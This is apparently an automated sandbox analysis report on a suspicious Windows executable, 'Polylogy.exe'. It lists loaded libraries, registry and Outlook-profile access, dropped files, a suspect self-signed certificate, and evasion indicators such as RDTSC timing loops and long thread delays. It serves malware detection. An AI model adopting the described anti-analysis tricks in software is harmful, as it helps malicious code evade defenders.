            Source: C:\Users\user\Desktop\Polylogy.exeProcess created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: stempelpudernes.lnk.0.drLNK file: ..\Pictures\muringerne\giggliest.pha
            Source: dinosaurusserne.lnk.0.drLNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre
            Source: C:\Users\user\Desktop\Polylogy.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Rebone\indberegne.iniJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.3393295886.0000000003396000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_10002D50 push eax; ret 0_2_10002D7E

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Forstenede' is not a known legitimate company. 3) Email domain 'Disgracia.No' appears suspicious and non-corporate. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible certificate manipulation. 5) Organization unit name 'Timerau belted Preaggressiveness' is nonsensical and appears randomly generated. 6) While the certificate dates are valid relative to current date (Feb 2025), the overall certificate chain is untrustworthy. 7) Though the country (GB) is generally reputable, other certificate elements strongly suggest this is a fake identity trying to appear legitimate by using a trusted country code.
            Source: C:\Users\user\Desktop\Polylogy.exeFile created: C:\Users\user\AppData\Local\Temp\nsj3433.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Polylogy.exeAPI/Special instruction interceptor: Address: 3AB81C1
            Source: C:\Users\user\Desktop\Polylogy.exeAPI/Special instruction interceptor: Address: 1FE81C1
            Source: C:\Users\user\Desktop\Polylogy.exeRDTSC instruction interceptor: First address: 3A91D8B second address: 3A91D8B instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F31F06EA11Dh 0x00000008 inc ebp 0x00000009 cmp si, E17Eh 0x0000000e inc ebx 0x0000000f cmp edi, 6641DD63h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Polylogy.exeRDTSC instruction interceptor: First address: 1FC1D8B second address: 1FC1D8B instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F31F0736D8Dh 0x00000008 inc ebp 0x00000009 cmp si, E17Eh 0x0000000e inc ebx 0x0000000f cmp edi, 6641DD63h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Polylogy.exeMemory allocated: 5290000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeMemory allocated: 35CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeMemory allocated: 359C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598498Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598141Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeThread delayed: delay time: 596453Jump to behavior
